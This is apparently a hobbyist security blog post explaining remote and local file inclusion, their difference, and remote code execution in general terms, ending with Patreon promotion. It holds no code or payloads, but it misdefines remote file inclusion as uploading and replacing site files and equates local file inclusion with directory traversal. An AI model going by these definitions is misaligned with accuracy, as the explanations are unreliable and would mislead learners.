Futaba _ Webs πΈπΈππΈπΈ
Remote/Local File Inclusion πΈπΈππΈπΈ
Today I want to talk about two different types of file inclusion techniques that can be used to exploit web applications: Remote File Inclusion and local file inclusion. I also want to talk about the difference between the two since they tend to be mistaken for one another, as well as a few techniques that can be used to mitigate against them.
π Article π Glossary π Catalog π Home π Search Modeπ Article Glossary
πΈ Synopsis πΈ
Today I want to talk about two different types of file inclusion techniques that can be used to exploit web applications: Remote File Inclusion and local file inclusion. I also want to talk about the difference between the two since they tend to be mistaken for one another, as well as a few techniques that can be used to mitigate against them.
πΈ Article Topics πΈ
I'll be discussing the following topics in order: π Premise π What is Remote File inclusion? π What is local file inclusion? π The difference between the two? π What is RCE? You can click on any of the topics to simply check that one out if it interests you! NOTE: Articles are read from LEFT to RIGHT via 2 columns! Read the first column all the way down and then move to the next one!
πΈ Key Links πΈ
Here's a quick run down on all the main links that are in the article in case you want to check them out first. π LinkedIn Version π Patreon Version
π DANGER! Windows Recall
Premise πΈπΈππΈπΈ
Today's article will include a video demonstration of how to perform local file inclusion, also known as directory traversal, against a remote web application server. I'll even cover one of the best FREE beginner tools that you can use to apply the technique in a more automated fashion.
If you would like to see how to perform remote file inclusion, as well as the best means to do so, then I suggest checking out this video here from my patreon lab for the TCPBackdoor exploit.
What is Remote File inclusion? πΈπΈππΈπΈ
Remote file inclusion is the process of directly uploading malicious files/payloads to a remote web application server in order to have it become a part of the main file archives that belong to it.. This allows the threat actor to infect and or control the web application on a massive scale, as well as deliver unsuspecting payloads to end users that use said service. If done correctly. it can lead to the compromising of many end user networks and IoT devices if not mitigated correctly.
As you know, web application servers use the HTTP/HTTPS protocol to host various html files that end users can access through the internet on behalf of a web browser application. When you visit a website, you're auto directed to the main HTML index page welcoming you to the site. From there the end user browses the site through the main UI(user interface) which will allow them to view any and all HTML pages that are hosted on the web application, as well as any other fields that might be included with it.
Web applications, as Iβve mentioned earlier, host various other files that are accessible to the end user, like executables, that are auto downloaded to their system the moment they visit the resource location on the server.
For example: https://website[.]com/Download.exe (JUST AN EXAMPLE! IT'S NOT REAL)
When you visit this link, it will download a file that is known simply as "Download.exe". Much like how when you visit an HTML page, it's automatically displayed and interpreted on the screen for you, downloadable non HTML files are auto downloaded to your system for you to use.
Remote file inclusion exploits both of these things discussed about web applications in 2 ways.
#1, it can host fake pages and replace the pre-existing ones with spoofed pages that are malicious.
Ever heard of a website that was hacked, and suddenly all the "legitimate" web pages on it were now all malicious and infected end user systems? Well this is how REAL threat actors go about it when they compromise a web application.
By exploiting this vulnerability in a LEGITIMATE web application, you not only trick the web browser and security in place to protect the end user from spoofed sites, BUT, you also trick the end user into visiting pages that are malicious, allowing them to steal sensitive credentials, and even land a botnet onto the end user network should they want to extend their overall attack surface.
#2, it can be used to host executables that are auto downloaded to the victim's system
It's no shocker that one of the bread and butters for a threat actor is to use this technique to host malicious payloads that are auto downloaded to the victim's system. This can be deadly if it's a majorly trusted executable whose signature is also spoofed and ran on the target system.
Imagine VSCode, a desktop application that is commonly trusted and downloaded onto millions of systems daily, suddenly replaced with a fake version that was trusted by any and all end user systems? This would lead to a massive breach on many systems, as it's also possible for an attacker to spoof the signature of the software to bypass security. They can even do stuff like DLL and Code injection, as well as many obfuscation techniques to go undetected. The list goes on with the amount of creativity and devastating dama that can be done should an attacker land this critical flaw against a well trusted system
#3 it can allow you to pull of RCE and directory traversal
If you manage to pop a php file to a web application, you basically have a remote backdoor into the system that you can tap into whenever you need to and further extend your reach to the network the web application is hosted on.
What is local file inclusion? πΈπΈππΈπΈ
Local file inclusion, also known as directory traversal, is a technique that allows you to browse the web application's file system. This isn't a form of RCE no, BUT, it does allow you to browse stuff that is outside the bounds of the web application root directory.
As mentioned before, when you visit a web application you are accessing the HTML files via the file system of the web application.
For security reasons, in order to prevent you from accessing files outside those bounds, you are prohibited from being able to view anything that is not a part of the main web application root directory that is configured for it.
Directory traversal bypasses this security and allows you to access any and all files that are sensitive on the system.
This can also lead to RCE because should you, in the event there is an open SSH service for example, should you happen to find the credentials to connect with the right privileges, you can extend your attack surface.
You can also view any and all sensitive files to gain access to password data that can allow you to compromise any services that are tied to the web application, such as the administrative credentials for login pages if they happen to be there.
The difference between the two? πΈπΈππΈπΈ
The biggest overall difference between remote file inclusion and local file inclusion, is that remote file inclusion is more you uploading and or replacing legitimate files on the web application to infect it.
Local file inclusion is more used to browse the system to find sensitive files and or credentials. You can exploit this in various ways, even through programs on the file system that print text data from various files in the web application system.
What is RCE? πΈπΈππΈπΈ
RCE, RCE, RCE! Youβve been hearing me say this a lot, but I havenβt quite yet explained what it means right?
RCE, remote code execution, is the main goal and bread and butter for any and all forms of injection exploits against any system. It's commonly applied to various things: buffer overflows via obfuscated malware, remote code execution, SQL injection, etc. Itβs also just a common end game for any form of breach.
Your end goal is to always find a way to RCE a system in order to control it directly via shell code commands, which can be combined with various coding techniques to deal more damage.
If you like to see the more advanced version of this article that talks about methods that can be used to mitigate, as well as any videos included, SUBSCRIBE TO MY PATREON CYBER SECURITY TIER!
If you enjoyed this post give it a thumbs up! Iβll be keeping track of whose reacting from now on as there is a βspecialβ reason for it. Just know the more you support my content the more there is in stored!
- The Hacker Who Laughs πΈπΈππΈπΈ
